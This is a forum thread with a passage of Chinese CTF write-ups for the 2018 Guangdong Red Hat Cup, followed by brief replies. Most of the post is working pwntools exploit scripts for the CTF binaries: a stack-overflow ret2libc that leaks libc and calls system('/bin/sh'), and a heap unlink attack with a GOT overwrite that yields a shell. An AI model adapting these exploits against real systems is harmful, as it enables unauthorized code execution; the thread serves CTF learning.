2018广东红帽杯的一些pwn的复现

iopr · 发表于 2019-6-14 09:31

pwn1 game_server 一个简单的栈溢出#game_server exp
# coding:UTF-8
from pwn import *

context()

io=process('./gameserver')
gameserver=ELF('./gameserver')
libc=ELF('./libc-2.23.so')
buf=0xBF9EA437
ret=0xBF9EA54C

io.recv()
io.sendline('a'*254)
io.recv()
io.sendline('a'*254)
io.recv()
io.sendline("Y")
io.sendline((ret-buf)*'a'+p32(gameserver.plt['puts'])+p32(0x080484D0)+p32(gameserver.got['puts']))
io.recvuntil('introduce : ')
io.recvuntil('\n\n')
libc_base=u32(io.recv(4))-libc.symbols['puts']
print "libc_base -> "+hex(libc_base)
print "/bin/sh -> " + hex(libc_base+libc.search("/bin/sh").next())
print "system -> " + hex(libc_base+libc.symbols['system'])

io.recv()
io.sendline('a'*254)
io.recv()
io.sendline('a'*254)
io.recv()
io.sendline("Y")
io.sendline((ret-buf)*'a'+p32(libc_base+libc.symbols['system'])+p32(0x080484D0)+p32(libc_base+libc.search("/bin/sh").next()))
io.interactive()

pwn2 -> shellcode_manager
主要难点是在加密,虽然可以计算出来.然是io有点奇怪,这段exp是本地跑通了的.但是要试多次才可以.
# coding:UTF-8
from pwn import *
# 这个题目的io可以说是非常的奇怪了,不难,就是他妈的可能需要爆破一下
io=process('./pwn3')
elf=ELF("./pwn3")
libc=ELF('./libc-2.23.so')

io.recv(4) # 四个无用字节
miwen=io.recv(19) # No passcode No fun\n 异或加密后的数据
yuanwen='No passcode No fun\n'
key=''
password=''
re=[117,105,48,110,117,104,67,49][::-1]
for i in range(19):
key=key+chr(ord(miwen[i])^ord(yuanwen[i]))
# 这里需要将所有的输入都跟key进行异或
io.recv(timeout=0.1) # 清空程序的所有输出
# 105.,  48., 110., 117., 104.,  67.,  49., 117
io.send('8')
for i in range(8):
password=password+chr(re[i]^ord(key[i]))
io.send(password)
io.recv(timeout=0.1)
# pass

# 这里需要先malloc一个256,放入256字节,泄露出它的256 Byte key

# add 256Byte chunk
io.sendline('1')
io.recv()
io.sendline('256')
io.recv()

# fill
io.sendline('3')
io.recv()
io.sendline('0')
io.sendline('256')
io.send('a'*256)

# show
io.recv()
io.sendline('4')
io.recv()
io.sendline('0')
io.recvuntil('Note 0\n')

# 得到key
re2=io.recv(256)
key=''
for i in range(len(re2)):
key=key+chr(ord(re2[i])^0x61)

# free掉
io.recv(timeout=0.1)
io.sendline('2')
io.recv()
io.sendline('0')
io.recv()

#-------------------------------------------------------------------------------------------------------------------------------------------------
def change(content):
a=''
for i in range(len(content)):
      a=a+chr(ord(content[i])^ord(key[i]))
return a

def add(size):
io.sendline('1')
io.recvuntil(change('So you shellcode size?\n'))
io.sendline(str(size))
io.recvuntil(change('Create Success\n'))

def delete(id):
io.sendline('2')
io.recvuntil(change('So what shellcode what to delete?\n'))
io.sendline(str(id))
io.recvuntil(change('delete Success\n'))

def fill(id,size,content):
io.sendline('3')
io.recvuntil(change('So witch shellcode what to edit?\n'))
io.sendline(str(id))
io.recvuntil(change('Your note: '))
io.sendline(str(size))
sleep(0.1)
io.send(content.ljust(size,'\x00'))
io.recvuntil(change('Success\n'))

def show(id,size):
io.sendline('4')
io.recvuntil(change('So what shellcode to show?\n'))
io.sendline(str(id))
io.recvuntil('Note '+str(id)+'\n')
return io.recv(size)
add(0x48) # 1
add(0x48) # 2
add(0x48) # 3
add(0x48) # 4
add(0x48) # 5
add(0x48) # 6
add(0x48) # 7
add(0x48) # 8
add(0x100)  # 9
fill(1,0x8,change('/bin/sh\x00'))
fill(9,0x100,change(p64(0x100)*31+p64(0x101)))
fill(8,0x48,change(p64(0)+p64(0x41)+p64(0x00000000006021A0-0x18)+p64(0x00000000006021A0-0x10)+p64(0)+p64(0)+p64(0)+p64(0)+p64(0x40)))
delete(9)
# 现在index8已经指向0x0000000000602188
fill(8,0x19,change(p64(0x48)+p64(elf.got['puts'])+p64(0x48)))
io.send('4')
io.recvuntil(change('So what shellcode to show?\n'))
io.send('7')
io.recvuntil('Note 7\n')
libc_base=u64((io.recv(6)).ljust(8,'\x00'))-libc.symbols['puts']
print "libc_base -> "+ hex(libc_base)
libc_system=libc_base+libc.symbols['system']
pause()
q=change('\x00'*6+p64(libc_system)[:-2])
for i in q:
print hex(ord(i)),
b=change(p64(libc_system)[:-2])
fill(7,6,b*2)
io.sendline('4')
io.sendline('1')
io.sendline('1')
io.interactive()

pwn 3 -> starcraft_rpg
主要考点在与sprintf格式化字符串的利用.
这里没有exp.可以参考https://www.secpulse.com/archives/71342.html
有pwn师傅的可以一起讨论一下题目,这里因为是很久之前的复现了,只是简单的把exp放上来而已.

wuyifan520zhang · 发表于 2019-6-14 22:08

居然没有人？好吧抢沙发！楼主加油！

明天会更好8866 · 发表于 2019-6-15 08:40

提示: 作者被禁止或删除内容自动屏蔽

iopr · 发表于 2019-6-15 12:53

em 僵硬了一点，下次复现的时候写个详细的解题流程分享给大家。

静叶流云 · 发表于 2019-6-15 20:08

欢迎发布有价值的原创作品

fengzai · 发表于 2019-6-16 16:26

很强很强

Hmily · 发表于 2019-7-17 17:50

内容有些简单，丰富下会好很多。

帐号		自动登录	找回密码
密码			注册[Register]

明天会更好8866 明天会更好8866 当前离线好友阅读权限 0 听众最后登录 1970-1-1 头像被屏蔽	明天会更好8866 发表于 2019-6-15 08:40 吾爱破解论坛没有任何官方QQ群，禁止留联系方式，禁止任何商业交易。提示: 作者被禁止或删除内容自动屏蔽
	如何升级？如何获得积分？积分对应解释说明！
	回复支持举报

[CTF] 2018广东红帽杯的一些pwn的复现

免费评分

个人中心